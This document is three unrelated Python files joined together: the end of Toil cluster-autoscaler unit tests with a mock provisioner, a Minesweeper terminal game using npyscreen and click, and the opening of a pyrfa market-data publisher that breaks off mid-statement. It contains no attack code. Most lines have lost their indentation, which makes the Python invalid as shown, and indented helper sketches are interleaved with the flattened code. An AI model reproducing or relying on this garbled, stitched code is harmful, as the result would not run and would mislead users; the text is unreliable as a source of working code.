self.assertEqual(estimatedNodeCounts[c4_8xlarge_preemptable], 3)
@travis_test
def testPreemptableDeficitResponse(self):
"""
When a preemptable deficit was detected by a previous run of the
loop, the scaler should add non-preemptable nodes to
compensate in proportion to preemptableCompensation.
"""
self.config.targetTime = 1
self.config.betaInertia = 0.0
self.config.maxNodes = [10, 10]
# This should mean that one non-preemptable node is launched
# for every two preemptable nodes "missing".
self.config.preemptableCompensation = 0.5
# In this case, we want to explicitly set up the config so
# that we can have preemptable and non-preemptable nodes of
# the same type. That is the only situation where
# preemptableCompensation applies.
self.config.nodeTypes = ['c4.8xlarge:0.6', 'c4.8xlarge']
self.provisioner.nodeTypes = ['c4.8xlarge', 'c4.8xlarge']
self.provisioner.nodeShapes = [c4_8xlarge_preemptable,
c4_8xlarge]
scaler = ClusterScaler(self.provisioner, self.leader, self.config)
# Simulate a situation where a previous run caused a
# "deficit" of 5 preemptable nodes (e.g. a spot bid was lost)
scaler.preemptableNodeDeficit['c4.8xlarge'] = 5
# Add a bunch of preemptable jobs (so the bin-packing
# estimate for the non-preemptable node should still be 0)
jobShapes = [Shape(wallTime=3600,
cores=2,
memory=h2b('1G'),
disk=h2b('2G'),
preemptable=True)] * 1000
estimatedNodeCounts = scaler.getEstimatedNodeCounts(jobShapes, defaultdict(int))
# We don't care about the estimated size of the preemptable
# nodes. All we want to know is if we responded to the deficit
# properly: 0.5 * 5 (preemptableCompensation * the deficit) = 2.5, which rounds up to 3.
self.assertEqual(estimatedNodeCounts[self.provisioner.nodeShapes[1]], 3)
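# Hedged sketch of the compensation arithmetic exercised above (assuming the
# scaler simply scales the deficit by preemptableCompensation and rounds up):
def _compensation_nodes(deficit, preemptable_compensation):
    # Non-preemptable nodes launched to cover a preemptable deficit.
    import math
    return int(math.ceil(deficit * preemptable_compensation))
# _compensation_nodes(5, 0.5) == 3, matching the assertion above.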
@travis_test
def testPreemptableDeficitIsSet(self):
"""
Make sure that updateClusterSize sets the preemptable deficit if
it can't launch preemptable nodes properly. That way, the
deficit can be communicated to the next run of
estimateNodeCount.
"""
# Mock out addNodes. We want to pretend it had trouble
# launching all 5 nodes, and could only launch 3.
self.provisioner.addNodes = MagicMock(return_value=3)
# Pretend there are no nodes in the cluster right now
self.provisioner.getProvisionedWorkers = MagicMock(return_value=[])
# In this case, we want to explicitly set up the config so
# that we can have preemptable and non-preemptable nodes of
# the same type. That is the only situation where
# preemptableCompensation applies.
self.config.nodeTypes = ['c4.8xlarge:0.6', 'c4.8xlarge']
self.provisioner.nodeTypes = ['c4.8xlarge', 'c4.8xlarge']
self.provisioner.nodeShapes = [c4_8xlarge_preemptable,
c4_8xlarge]
scaler = ClusterScaler(self.provisioner, self.leader, self.config)
estimatedNodeCounts = {c4_8xlarge_preemptable: 5, c4_8xlarge: 0}
scaler.updateClusterSize(estimatedNodeCounts)
self.assertEqual(scaler.preemptableNodeDeficit['c4.8xlarge'], 2)
self.provisioner.addNodes.assert_called_once()
# OK, now pretend this is a while later, and actually launched
# the nodes properly. The deficit should disappear
self.provisioner.addNodes = MagicMock(return_value=5)
scaler.updateClusterSize(estimatedNodeCounts)
self.assertEqual(scaler.preemptableNodeDeficit['c4.8xlarge'], 0)
@travis_test
def testNoLaunchingIfDeltaAlreadyMet(self):
"""
Check that the scaler doesn't try to launch "0" more instances if
the delta was able to be met by unignoring nodes.
"""
# We have only one node type for simplicity
self.provisioner.nodeTypes = ['c4.8xlarge']
self.provisioner.nodeShapes = [c4_8xlarge]
scaler = ClusterScaler(self.provisioner, self.leader, self.config)
# Pretend there is one ignored worker in the cluster
self.provisioner.getProvisionedWorkers = MagicMock(
return_value=[Node('127.0.0.1', '127.0.0.1', 'testNode',
datetime.datetime.now().isoformat(),
nodeType='c4.8xlarge', preemptable=True)])
scaler.ignoredNodes.add('127.0.0.1')
# Exercise the updateClusterSize logic
self.provisioner.addNodes = MagicMock()
scaler.updateClusterSize({c4_8xlarge: 1})
self.assertFalse(self.provisioner.addNodes.called,
"addNodes was called when no new nodes were needed")
self.assertEqual(len(scaler.ignoredNodes), 0,
"The scaler didn't unignore an ignored node when "
"scaling up")
@travis_test
def testBetaInertia(self):
# This is really high, but makes things easy to calculate.
self.config.betaInertia = 0.5
scaler = ClusterScaler(self.provisioner, self.leader, self.config)
# OK, smoothing things this much should get us 50% of the way to 100.
self.assertEqual(scaler.smoothEstimate(c4_8xlarge_preemptable, 100), 50)
# Now we should be at 75%.
self.assertEqual(scaler.smoothEstimate(c4_8xlarge_preemptable, 100), 75)
# We should eventually converge on our estimate as long as betaInertia is below 1.
for _ in range(1000):
scaler.smoothEstimate(c4_8xlarge_preemptable, 100)
self.assertEqual(scaler.smoothEstimate(c4_8xlarge_preemptable, 100), 100)
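# Hedged sketch of the exponential smoothing that betaInertia implies here
# (assuming smoothEstimate keeps one previous value per node shape):
def _smooth(previous, estimate, beta_inertia):
    # Move (1 - betaInertia) of the way from the previous value to the new estimate.
    return beta_inertia * previous + (1.0 - beta_inertia) * estimate
# With beta_inertia=0.5 and a previous value of 0: 0 -> 50 -> 75 -> ... -> 100,
# which is the sequence the assertions above expect.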
class ScalerThreadTest(ToilTest):
def _testClusterScaling(self, config, numJobs, numPreemptableJobs, jobShape):
"""
Test the ClusterScaler class with different patterns of job creation. Tests ascertain that
autoscaling occurs and that all the jobs are run.
"""
# First do a simple test of creating 100 preemptable and non-preemptable jobs and check that the
# jobs complete okay, then print the amount of worker time expended and the total
# number of worker nodes used.
mock = MockBatchSystemAndProvisioner(config, secondsPerJob=2.0)
mock.start()
clusterScaler = ScalerThread(mock, mock, config)
clusterScaler.start()
try:
# Add 100 jobs to complete
list(map(lambda x: mock.addJob(jobShape=jobShape),
list(range(numJobs))))
list(map(lambda x: mock.addJob(jobShape=jobShape, preemptable=True),
list(range(numPreemptableJobs))))
# Add some completed jobs
for preemptable in (True, False):
if preemptable and numPreemptableJobs > 0 or not preemptable and numJobs > 0:
# Add 1000 random jobs
for _ in range(1000):
x = mock.getNodeShape(nodeType=jobShape)
iJ = JobDescription(requirements=dict(
memory=random.choice(list(range(1, x.memory))),
cores=random.choice(list(range(1, x.cores))),
disk=random.choice(list(range(1, x.disk))),
preemptable=preemptable),
jobName='testClusterScaling', unitName='')
clusterScaler.addCompletedJob(iJ, random.choice(list(range(1, x.wallTime))))
startTime = time.time()
# Wait while the cluster processes the jobs
while (mock.getNumberOfJobsIssued(preemptable=False) > 0
or mock.getNumberOfJobsIssued(preemptable=True) > 0
or mock.getNumberOfNodes() > 0 or mock.getNumberOfNodes(preemptable=True) > 0):
logger.debug("Running, non-preemptable queue size: %s, non-preemptable workers: %s, "
"preemptable queue size: %s, preemptable workers: %s" %
(mock.getNumberOfJobsIssued(preemptable=False),
mock.getNumberOfNodes(preemptable=False),
mock.getNumberOfJobsIssued(preemptable=True),
mock.getNumberOfNodes(preemptable=True)))
clusterScaler.check()
time.sleep(0.5)
logger.debug("We waited %s for cluster to finish" % (time.time() - startTime))
finally:
clusterScaler.shutdown()
mock.shutDown()
# Print some info about the autoscaling
logger.debug("Total-jobs: %s: Max-workers: %s, "
"Total-worker-time: %s, Worker-time-per-job: %s" %
(mock.totalJobs, sum(mock.maxWorkers.values()),
mock.totalWorkerTime,
old_div(mock.totalWorkerTime, mock.totalJobs) if mock.totalJobs > 0 else 0.0))
@slow
def testClusterScaling(self):
"""
Test scaling for a batch of non-preemptable jobs and no preemptable jobs (makes debugging
easier).
"""
config = Config()
# Make defaults dummy values
config.defaultMemory = 1
config.defaultCores = 1
config.defaultDisk = 1
# No preemptable nodes/jobs
config.maxPreemptableNodes = [] # No preemptable nodes
# Non-preemptable parameters
config.nodeTypes = [Shape(20, 10, 10, 10, False)]
config.minNodes = [0]
config.maxNodes = [10]
# Algorithm parameters
config.targetTime = defaultTargetTime
config.betaInertia = 0.1
config.scaleInterval = 3
self._testClusterScaling(config, numJobs=100, numPreemptableJobs=0,
jobShape=config.nodeTypes[0])
@slow
def testClusterScalingMultipleNodeTypes(self):
smallNode = Shape(20, 5, 10, 10, False)
mediumNode = Shape(20, 10, 10, 10, False)
largeNode = Shape(20, 20, 10, 10, False)
numJobs = 100
config = Config()
# Make defaults dummy values
config.defaultMemory = 1
config.defaultCores = 1
config.defaultDisk = 1
# No preemptable nodes/jobs
config.preemptableNodeTypes = []
config.minPreemptableNodes = []
config.maxPreemptableNodes = [] # No preemptable nodes
# Make sure the node types don't have to be ordered
config.nodeTypes = [largeNode, smallNode, mediumNode]
config.minNodes = [0, 0, 0]
config.maxNodes = [10, 10] # test expansion of this list
# Algorithm parameters
config.targetTime = defaultTargetTime
config.betaInertia = 0.1
config.scaleInterval = 3
mock = MockBatchSystemAndProvisioner(config, secondsPerJob=2.0)
clusterScaler = ScalerThread(mock, mock, config)
clusterScaler.start()
mock.start()
try:
# Add small jobs
list(map(lambda x: mock.addJob(jobShape=smallNode), list(range(numJobs))))
list(map(lambda x: mock.addJob(jobShape=mediumNode), list(range(numJobs))))
# Add medium completed jobs
for i in range(1000):
iJ = JobDescription(requirements=dict(
memory=random.choice(range(smallNode.memory, mediumNode.memory)),
cores=mediumNode.cores,
disk=largeNode.cores,
preemptable=False),
jobName='testClusterScaling', unitName='')
clusterScaler.addCompletedJob(iJ, random.choice(range(1, 10)))
while mock.getNumberOfJobsIssued() > 0 or mock.getNumberOfNodes() > 0:
logger.debug("%i nodes currently provisioned" % mock.getNumberOfNodes())
# Make sure there are no large nodes
self.assertEqual(mock.getNumberOfNodes(nodeType=largeNode), 0)
clusterScaler.check()
time.sleep(0.5)
finally:
clusterScaler.shutdown()
mock.shutDown()
# Make sure jobs ran on both the small and medium node types
self.assertTrue(mock.totalJobs > 0)
self.assertTrue(mock.maxWorkers[smallNode] > 0)
self.assertTrue(mock.maxWorkers[mediumNode] > 0)
self.assertEqual(mock.maxWorkers[largeNode], 0)
@slow
def testClusterScalingWithPreemptableJobs(self):
"""
Test scaling simultaneously for a batch of preemptable and non-preemptable jobs.
"""
config = Config()
jobShape = Shape(20, 10, 10, 10, False)
preemptableJobShape = Shape(20, 10, 10, 10, True)
# Make defaults dummy values
config.defaultMemory = 1
config.defaultCores = 1
config.defaultDisk = 1
# non-preemptable node parameters
config.nodeTypes = [jobShape, preemptableJobShape]
config.minNodes = [0, 0]
config.maxNodes = [10, 10]
# Algorithm parameters
config.targetTime = defaultTargetTime
config.betaInertia = 0.9
config.scaleInterval = 3
self._testClusterScaling(config, numJobs=100, numPreemptableJobs=100, jobShape=jobShape)
# noinspection PyAbstractClass
class MockBatchSystemAndProvisioner(AbstractScalableBatchSystem, AbstractProvisioner):
"""
Mimics a job batcher, provisioner and scalable batch system
"""
def __init__(self, config, secondsPerJob):
super(MockBatchSystemAndProvisioner, self).__init__('clusterName')
# To mimic parallel preemptable and non-preemptable queues
# for jobs we create two parallel instances of the following class
self.config = config
self.secondsPerJob = secondsPerJob
self.provisioner = self
self.batchSystem = self
self.nodeTypes = config.nodeTypes
self.nodeShapes = self.nodeTypes
self.nodeShapes.sort()
self.jobQueue = Queue()
self.updatedJobsQueue = Queue()
self.jobBatchSystemIDToIssuedJob = {}
self.totalJobs = 0 # Count of total jobs processed
self.totalWorkerTime = 0.0 # Total time spent in worker threads
self.toilMetrics = None
self.nodesToWorker = {} # Map from Node to instances of the Worker class
self.workers = {nodeShape: [] for nodeShape in
self.nodeShapes} # Instances of the Worker class
self.maxWorkers = {nodeShape: 0 for nodeShape in
self.nodeShapes} # Maximum number of workers
self.running = False
self.leaderThread = Thread(target=self._leaderFn)
def start(self):
self.running = True
self.leaderThread.start()
def shutDown(self):
self.running = False
self.leaderThread.join()
# Stub out all AbstractBatchSystem methods since they are never called
for name, value in iteritems(AbstractBatchSystem.__dict__):
if getattr(value, '__isabstractmethod__', False):
exec('def %s(): pass' % name)
# Without this, the class would end up with .name and .value attributes
del name, value
# AbstractScalableBatchSystem methods
def nodeInUse(self, nodeIP):
return False
def ignoreNode(self, nodeAddress):
pass
def unignoreNode(self, nodeAddress):
pass
@contextmanager
def nodeFiltering(self, filter):
nodes = self.getProvisionedWorkers(preemptable=True,
nodeType=None) + self.getProvisionedWorkers(
preemptable=False, nodeType=None)
yield nodes
# AbstractProvisioner methods
def getProvisionedWorkers(self, nodeType=None, preemptable=None):
"""
Returns a list of Node objects, each representing a worker node in the cluster
:param preemptable: If True only return preemptable nodes else return non-preemptable nodes
:return: list of Node
"""
nodesToWorker = self.nodesToWorker
if nodeType:
return [node for node in nodesToWorker if node.nodeType == nodeType]
else:
return list(nodesToWorker.keys())
def terminateNodes(self, nodes):
self._removeNodes(nodes)
def remainingBillingInterval(self, node):
pass
def addJob(self, jobShape, preemptable=False):
"""
Add a job to the job queue
"""
self.totalJobs += 1
jobID = uuid.uuid4()
self.jobBatchSystemIDToIssuedJob[jobID] = JobDescription(requirements={"memory": jobShape.memory,
"cores": jobShape.cores,
"disk": jobShape.disk,
"preemptable": preemptable},
jobName='job{}'.format(self.totalJobs))
self.jobQueue.put(jobID)
# JobBatcher functionality
def getNumberOfJobsIssued(self, preemptable=None):
if preemptable is not None:
jobList = [job for job in list(self.jobQueue.queue) if
self.jobBatchSystemIDToIssuedJob[job].preemptable == preemptable]
return len(jobList)
else:
return self.jobQueue.qsize()
def getJobs(self):
return self.jobBatchSystemIDToIssuedJob.values()
# AbstractScalableBatchSystem functionality
def getNodes(self, preemptable=False, timeout=None):
nodes = dict()
for node in self.nodesToWorker:
if node.preemptable == preemptable:
worker = self.nodesToWorker[node]
nodes[node.privateIP] = NodeInfo(coresTotal=0, coresUsed=0, requestedCores=1,
memoryTotal=0, memoryUsed=0, requestedMemory=1,
workers=1 if worker.busyEvent.is_set() else 0)
return nodes
# AbstractProvisioner functionality
def addNodes(self, nodeType, numNodes, preemptable):
self._addNodes(numNodes=numNodes, nodeType=nodeType, preemptable=preemptable)
return self.getNumberOfNodes(nodeType=nodeType, preemptable=preemptable)
def getNodeShape(self, nodeType, preemptable=False):
# Assume node shapes and node types are the same thing for testing
return nodeType
def getWorkersInCluster(self, nodeShape):
return self.workers[nodeShape]
def launchCluster(self, leaderNodeType, keyName, userTags=None,
vpcSubnet=None, leaderStorage=50, nodeStorage=50, botoPath=None, **kwargs):
pass
def destroyCluster(self):
pass
def getLeader(self):
pass
def _leaderFn(self):
while self.running:
updatedJobID = None
try:
updatedJobID = self.updatedJobsQueue.get(timeout=1.0)
except Empty:
continue
if updatedJobID:
del self.jobBatchSystemIDToIssuedJob[updatedJobID]
time.sleep(0.1)
def _addNodes(self, numNodes, nodeType, preemptable=False):
nodeShape = self.getNodeShape(nodeType=nodeType, preemptable=preemptable)
class Worker(object):
def __init__(self, jobQueue, updatedJobsQueue, secondsPerJob):
self.busyEvent = Event()
self.stopEvent = Event()
def workerFn():
while True:
if self.stopEvent.is_set():
return
try:
jobID = jobQueue.get(timeout=1.0)
except Empty:
continue
updatedJobsQueue.put(jobID)
self.busyEvent.set()
time.sleep(secondsPerJob)
self.busyEvent.clear()
self.startTime = time.time()
self.worker = Thread(target=workerFn)
self.worker.start()
def stop(self):
self.stopEvent.set()
self.worker.join()
return time.time() - self.startTime
for _ in range(numNodes):
node = Node('127.0.0.1', uuid.uuid4(), 'testNode', datetime.datetime.now().isoformat()+'Z', nodeType=nodeType,
preemptable=preemptable)
self.nodesToWorker[node] = Worker(self.jobQueue, self.updatedJobsQueue, self.secondsPerJob)
self.workers[nodeShape].append(self.nodesToWorker[node])
self.maxWorkers[nodeShape] = max(self.maxWorkers[nodeShape], len(self.workers[nodeShape]))
def _removeNodes(self, nodes):
logger.debug("Removing nodes. %s workers and %s to terminate.", len(self.nodesToWorker),
len(nodes))
for node in nodes:
logger.debug("removed node")
try:
nodeShape = self.getNodeShape(node.nodeType, node.preemptable)
worker = self.nodesToWorker.pop(node)
self.workers[nodeShape].pop()
self.totalWorkerTime += worker.stop()
except KeyError:
# Node isn't our responsibility
pass
def getNumberOfNodes(self, nodeType=None, preemptable=None):
if nodeType:
nodeShape = self.getNodeShape(nodeType=nodeType, preemptable=preemptable)
return len(self.workers[nodeShape])
else:
return len(self.nodesToWorker)
|
terminalUI.py
|
#!/usr/bin/env python3
"""Minesweeper Game - Terminal Interface
Runs the game in the Terminal using npyscreen.
Use --help to show the possible flags and their use.
TODO: ranking - add datetime
FIXME: improve flags to change the TUI before initializing
FIXME: improve flags to start game immediately at X difficulty
"""
from minesweeper import Minesweeper
import npyscreen as nps
import regex as re
import json
import time
from threading import Thread
import click
class App(nps.NPSAppManaged):
"""Minesweeper App Module
This extends the class NPSAppManaged from npyscreen.
It defines the Forms to be used later on start.
It also defines "menu" as the first Form.
If a Map Difficulty was set, the App jumps immediately to the
Map Form and uses the set Difficulty and Player name.
"""
STARTING_FORM = "menu"
map = None
player = "NoName"
def onStart(self):
self.addForm("menu", MenuForm, "Minesweeper - Main Menu", minimum_lines=16)
self.addForm("custom", CustomMapForm, "Minesweeper - Custom Dificulty", minimum_lines=16)
self.addForm("map", MapForm, "Minesweeper - Game", minimum_lines=28)
if self.map:
map = self.getForm("map")
map.player.value = self.player
map.dificulty.value = self.map
if self.map == "Custom":
pass
elif self.map == "Easy":
map.gen_map(10,8,10)
elif self.map == "Normal":
map.gen_map(20,10,30)
elif self.map == "Hard":
map.gen_map(30,20,125)
self.setNextForm("map")
def setGameOptions(self, name, dificulty):
"""Set game options"""
self.player = name
self.map = dificulty
### FORMS
class MenuForm(nps.ActionForm):
"""Menu Form Module
This extends the class ActionForm from npyscreen.
It contains a field for the Player Name and a Difficulty selector.
Pressing Cancel leaves the game.
Pressing OK takes the Player to the game Screen/Form, unless the player
selected the Custom difficulty (in that case the player is taken to an extra
Form for custom size settings before going into the game).
"""
def create(self):
"""Create Custom Form
This function is called when Custom Form is created.
It creates all the widgets for the Form.
"""
# self.example = self.add(nps.TitleFixedText, name="Fixed Title", value="Fixed Label", editable=False, labelColor="STANDOUT", color="CAUTION")
self.player = self.add(nps.TitleText, name="Name:", labelColor="STANDOUT")
self.nextrely += 1
self.dificulty = self.add(nps.TitleSelectOne, name="Dificulty", values=["Custom", "Easy", "Normal", "Hard"], value=[1], labelColor="STANDOUT", max_height=5, scroll_exit=True)
self.nextrely += 1
self.add(nps.FixedText, value="Maximazing the Terminal is very advised!", editable=False, color="CAUTION")
def on_ok(self):
map = self.parentApp.getForm("map")
map.player.value = self.player.value or "NoName"
selectedDificulty = self.dificulty.values[self.dificulty.value[0]]
map.dificulty.value = selectedDificulty
if selectedDificulty == "Custom":
self.parentApp.setNextForm("custom")
else:
if selectedDificulty == "Easy":
map.gen_map(10,8,10)
elif selectedDificulty == "Normal":
map.gen_map(20,10,30)
elif selectedDificulty == "Hard":
map.gen_map(30,20,125)
self.parentApp.setNextForm("map")
def on_cancel(self):
self.parentApp.setNextForm(None)
# self.parentApp.switchForm(None)
class CustomMapForm(nps.ActionForm):
"""Custom Form Module
This extends the class ActionForm from npyscreen.
It contains 3 sliders for the Player to choose the Custom Width, Height and Number of Mines.
Pressing Cancel takes the Player back to the Menu.
Pressing OK takes the Player to the game Screen/Form.
Note: Number of Mines cannot be greater than half of the Minefield size.
"""
def create(self):
"""Create Custom Form
This function is called when Custom Form is created.
It creates all the widgets for the Form.
"""
self.width = self.add(nps.TitleSlider, name="Custom Width (Min 5 | Max 40):", labelColor="STANDOUT", lowest=5, out_of=40, value=5)
self.height = self.add(nps.TitleSlider, name="Custom Height (Min 5 | Max 20):", labelColor="STANDOUT", lowest=5, out_of=20, value=5)
self.mines = self.add(nps.TitleSlider, name="Custom Number of Mines (Min 10 | Max W*H/2):", labelColor="STANDOUT", lowest=10, out_of=400, value=10)
def on_ok(self):
size = int(self.width.value)*int(self.height.value)
if int(self.mines.value) > size/2 :
nps.notify_confirm("Map cannot have more than half mine squares!!!\n(Number Mines > Half Map Size)", "Too many mines!!!", editw=1)
else:
width = int(self.width.value)
height = int(self.height.value)
mines = int(self.mines.value)
map = self.parentApp.getForm("map")
map.gen_map(width,height,mines)
self.parentApp.setNextForm("map")
def on_cancel(self):
self.parentApp.switchFormPrevious()
class MapForm(nps.FormBaseNew):
"""Map Form Module
This extends the class FormBaseNew from npyscreen.
It contains information about the game (player name and minefield size and mine number) and the minefield.
List of Shortcuts:
-> d - discover/reveals a square
-> f - flags a square
-> q - quit/leave game
-> r - restart game
-> p - pause game (TODO)
-> arrows - move cursor
-> h/j/k/l - move cursor
Attributes
----------
minefieldClass : Minesweeper instance (see minesweeper.py)
Matrix where each position is a Tuple (Status,Number)
NOTES:
Each cell/square (from the class matrixTuples variable) is a
Tuple (Status,Number)
-> status - (flagged -1/hidden 0/visible 1)
-> number - square number (or -1 for mines)
"""
def h_flag(self, ascii_code):
"""Minefield Flag handler
This function handles a right-click.
This flags a square in-game.
"""
x = self.minefieldGrid.edit_cell[1]
y = self.minefieldGrid.edit_cell[0]
self.minefieldClass.flag(x,y)
if self.minefieldClass.checkVictory():
self.timer_end = time.time()
self.final_time = self.timer_end - self.timer_start
self.timer_start = 0
submit_time(self.dificulty.value, self.player.value, self.timer.value)
response = nps.notify_yes_no("You Won the Game !!!\nTime: "+str(self.final_time)+"\nDo you wish to replay the Map?", title="VICTORY", form_color='STANDOUT', wrap=True, editw=1)
if response:
self.gen_map(int(self.width.value),int(self.height.value),int(self.mines.value))
self.display()
else:
self.parentApp.switchForm("menu")
def h_discover(self, ascii_code):
"""Minefield Click handler
This function handles a left-click.
This reveals a square in-game.
"""
if self.timer_start == 0:
self.timer_start = time.time()
self.timer.value = "0"
self.timer.display()
x = self.minefieldGrid.edit_cell[1]
y = self.minefieldGrid.edit_cell[0]
result = self.minefieldClass.click(x,y,expand=True)
if result == -2: # mine on first square
while result == -2: # generate new map until its safe
self.gen_map(int(self.width.value),int(self.height.value),int(self.mines.value))
result = self.minefieldClass.click(x,y,expand=True)
self.display()
if result == -1: # mine
self.timer_end = time.time()
self.final_time = self.timer_end - self.timer_start
self.timer_start = 0
response = nps.notify_yes_no("You Lost the Game :(\nYour current time was: "+str(self.final_time)+"\nDo you wish to retry the Map?\n", title="LOST", form_color='STANDOUT', wrap=True, editw=1)
if response:
self.gen_map(int(self.width.value),int(self.height.value),int(self.mines.value))
self.display()
else:
self.parentApp.switchForm("menu")
def h_terminate(self, ascii_code):
"""Minefield Terminate handler
This terminates/quits the current game, returning to the Menu.
"""
self.timer_start = 0 # stop timer
self.timer.value = "0"
self.timer.display()
self.parentApp.switchForm("menu")
def h_restart(self, ascii_code):
"""Minefield Restart handler
This restarts the game, with a new Minefield, but the same settings.
"""
self.timer_start = 0 # stop timer
self.timer.value = "0"
self.timer.display()
self.gen_map(int(self.width.value),int(self.height.value),int(self.mines.value))
# def onStart(self):
def create(self):
"""Create Map Form
This function is called when Map Form is created.
It creates all the widgets for the Form and the shortcut handlers.
"""
new_handlers = {
"d" : self.h_discover,
"f" : self.h_flag,
"t" : self.h_terminate,
"r" : self.h_restart,
# "p" : self.h_pause,
}
self.add_handlers(new_handlers)
# INFO area
self.player = self.add(nps.TitleFixedText, name="Your Name: ", labelColor="STANDOUT", use_two_lines=False, begin_entry_at=11, editable=False)
self.nextrelx += 24
self.nextrely -= 1
self.timer = self.add(nps.TitleFixedText, name="Time:", value="0", labelColor="STANDOUT", use_two_lines=False, begin_entry_at=7, editable=False)
# MAP INFO area
self.nextrelx = 2
self.dificulty = self.add(nps.TitleFixedText, name="Dificulty: ", labelColor="STANDOUT", use_two_lines=False, begin_entry_at=11, editable=False)
self.nextrelx += 24
self.nextrely -= 1
self.width = self.add(nps.TitleFixedText, name="Width: ", labelColor="STANDOUT", use_two_lines=False, begin_entry_at=7, editable=False)
self.nextrelx += 16
self.nextrely -= 1
self.height = self.add(nps.TitleFixedText, name="Height: ", labelColor="STANDOUT", use_two_lines=False, begin_entry_at=8, editable=False)
self.nextrelx += 16
self.nextrely -= 1
self.mines = self.add(nps.TitleFixedText, name="Mines: ", labelColor="STANDOUT", use_two_lines=False, begin_entry_at=7, editable=False)
# SHORTCUTS area
self.nextrelx = 2
self.add(nps.FixedText, value="Shorcuts: ", color="STANDOUT", editable=False)
self.nextrelx += 12
self.nextrely -= 1
self.add(nps.TitleFixedText, name="d: ", value="click", labelColor="GOOD", use_two_lines=False, begin_entry_at=4, editable=False)
self.add(nps.TitleFixedText, name="f: ", value="flag", labelColor="GOOD", use_two_lines=False, begin_entry_at=4, editable=False)
self.add(nps.TitleFixedText, name="t: ", value="terminate", labelColor="GOOD", use_two_lines=False, begin_entry_at=4, editable=False)
self.add(nps.TitleFixedText, name="r: ", value="restart", labelColor="GOOD", use_two_lines=False, begin_entry_at=4, editable=False)
# self.add(nps.TitleFixedText, name="p: ", value="pause", labelColor="GOOD", use_two_lines=False, begin_entry_at=4, editable=False)
# MINEFIELD area
self.nextrelx = 2
self.nextrely += 1
self.minefieldGrid = self.add(MinefieldGridWidget, name=" ", column_width=2, col_margin=0, row_height=1)
# TIMER stuff
self.timer_start = 0
self.thread_time = Thread(target=self.update_time,args=())
self.thread_time.daemon = True
self.thread_time.start()
def update_time(self):
""" Timer handler
This function updates the timer label once per second
(in practice it makes the timer go up by 1 second).
"""
while True:
if self.timer_start != 0:
self.timer_end = time.time()
self.timer.value = str(int(self.timer_end - self.timer_start))
self.timer.display()
time.sleep(1)
def gen_map(self, width, height, mines):
"""Generate Minesweeper Map
Uses the Minesweeper class from minesweeper.py.
Creates an instance of Minesweeper with the given parameters and
passes the matrix values to the Minefield grid widget values.
"""
self.width.value = width
self.height.value = height
self.mines.value = mines
self.minefieldClass = Minesweeper(width,height,mines)
self.minefieldGrid.values = self.minefieldClass.matrixTuples
### WIDGETS
class MinefieldGridWidget(nps.SimpleGrid):
"""Minefield Widget Module
This extends the class SimpleGrid from npyscreen.
It contains the minefield grid.
It applies custom colors to the square depending on the square value.
NOTES:
Each cell is a Tuple (Status,Number)
-> status - (flagged -1/hidden 0/visible 1)
-> number - square number (or -1 for mines)
"""
def custom_print_cell(self, actual_cell, display_value):
"""Custom cell color and value
This function changes the color of the cell, depending on its
gameplay status and value.
"""
if display_value:
aux = re.sub("[()]","",display_value)
aux = re.split(", ", aux)
status = aux[0]
number = aux[1]
square = tuple((status,number))
if status == "-1":
actual_cell.value = "F"
actual_cell.color = 'CAUTION'
elif status == "0":
actual_cell.value = "#"
actual_cell.color = 'DEFAULT' # debug
# actual_cell.color = 'VERYGOOD' # debug
else:
if number == "-1":
actual_cell.value = "*"
actual_cell.color = 'CAUTION' # debug
# actual_cell.color = 'CRITICAL' # debug
else:
actual_cell.value = number
if number == "0":
actual_cell.value = " "
actual_cell.color = 'DEFAULT'
elif number == "1":
actual_cell.color = 'STANDOUT'
elif number == "2":
actual_cell.color = 'SAFE'
elif number == "3":
actual_cell.color = 'DANGER'
elif number == "4":
actual_cell.color = 'NO_EDIT'
elif number == "5":
actual_cell.color = 'NO_EDIT'
elif number == "6":
actual_cell.color = 'NO_EDIT'
elif number == "7":
actual_cell.color = 'NO_EDIT'
elif number == "8":
actual_cell.color = 'NO_EDIT'
# else:
# actual_cell.color = 'DEFAULT' # debug
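# Hedged sketch of the (status, number) -> character mapping implemented above,
# written for already-parsed integer values, as a compact reference:
def _cell_char(status, number):
    # status: -1 flagged, 0 hidden, 1 visible; number: -1 mine, 0-8 neighbour count
    if status == -1:
        return "F"
    if status == 0:
        return "#"
    if number == -1:
        return "*"
    return " " if number == 0 else str(number)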
def runTerminal(options):
"""Run the game in Terminal
If options is None, a Menu will be opened to the Player.
Otherwise the game will jump to the Map form, and set the Player name,
and Map Dificulty using the options values.
options = tuple(name, dificulty)
"""
app = App()
if options:
name, dificulty = options
app.setGameOptions(name, dificulty)
app.run()
def show_rankings(rankings, top):
    """Pretty-print the rankings, showing the top N times per difficulty."""
    if top < 1:
        top = 5
    for dificulty, entries in rankings:
        print(dificulty)
        for player, time in entries[:top]:
            print(">", player, time)
#TODO move to minesweeper class
def submit_time(dificulty, player, time):
    """Append a finished game time to the ranking.json file."""
    with open('ranking.json') as rankings_file:
        rankings = json.load(rankings_file)
    time = int(time)
    rankings.setdefault(dificulty, {}).setdefault(player, []).append(time)
    with open('ranking.json', 'w') as rankings_file:
        json.dump(rankings, rankings_file, indent=2)
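# Hedged example of the ranking.json layout that submit_time assumes
# (difficulty -> player -> list of completion times in seconds):
#
# {
#   "Easy": {"NoName": [42, 57]},
#   "Normal": {"Alice": [133]}
# }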
@click.command()
@click.option('-n', '--name', default="NoName", help='Player name (used in rankings)')
@click.option('-d', '--dificulty', help='Map Dificulty (Easy, Normal, Hard, Custom)')
@click.option('--rankings', help='Show Rankings')
@click.option('--import', 'import_file', help='Import Rankings from file')
@click.option('--export', 'export_file', help='Export Rankings to file')
@click.option('--merge', 'merge_file', help='Merge Rankings from file with current Rankings')
def main(name, dificulty, rankings, import_file, export_file, merge_file):
# print("ARGS=>", name, dificulty, rankings, import_file, export_file, merge_file) # debug
if import_file:
Minesweeper.import_rankings(import_file)
elif export_file:
Minesweeper.export_rankings(export_file)
elif merge_file:
Minesweeper.merge_rankings(merge_file)
elif rankings:
ranks = Minesweeper.get_rankings()
show_rankings(ranks, int(rankings))
elif dificulty:
runTerminal((name, dificulty))
else:
runTerminal(None)
if __name__ == "__main__":
main()
|
multiprocess.py
|
#!/usr/bin/python
#
# Interactive (server) publisher for market price domain
#
import time
import multiprocessing
import random
import pyrfa
def publish():
try:
p = pyrfa.Pyrfa()
p.createConfigDb("./pyrfa.cfg")
p.acquireSession("Session4")
p.createOMMProvider()
p.login()
p.dictionaryRequest()
IMAGES = {'RIC':'EUR=', 'RDNDISPLAY':200, 'RDN_EXCHID':155, 'BID':0.988, 'ASK':0.999, 'DIVPAYDATE':'20110623'},
